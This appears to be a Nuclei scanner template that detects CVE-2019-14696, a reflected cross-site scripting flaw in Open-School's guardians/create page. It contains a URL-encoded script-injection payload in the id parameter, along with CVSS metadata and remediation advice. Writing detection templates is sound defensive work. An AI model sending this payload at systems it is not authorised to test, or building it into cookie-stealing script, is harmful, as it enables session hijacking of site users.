id: CVE-2019-14696 info: name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting author: pikpikcu severity: medium description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://open-school.org - https://pastebin.com/AgxqdbAQ - http://packetstormsecurity.com/files/153984/Open-School-3.0-Community-Edition-2.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-14696 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00618 epss-percentile: 0.78345 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 vendor: open-school product: open-school tags: cve,cve2019,xss,open-school,packetstorm http: - method: GET path: - '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a00463044022021c34366a64cbfdefebecb4aa4f7c353eea5fdc366066e809cb883b1b48eebfa022037201460a13c29307875ac704248267640de95a2ab5743fdca89234c2bde1126:922c64590222798bb761d5b6d8e72950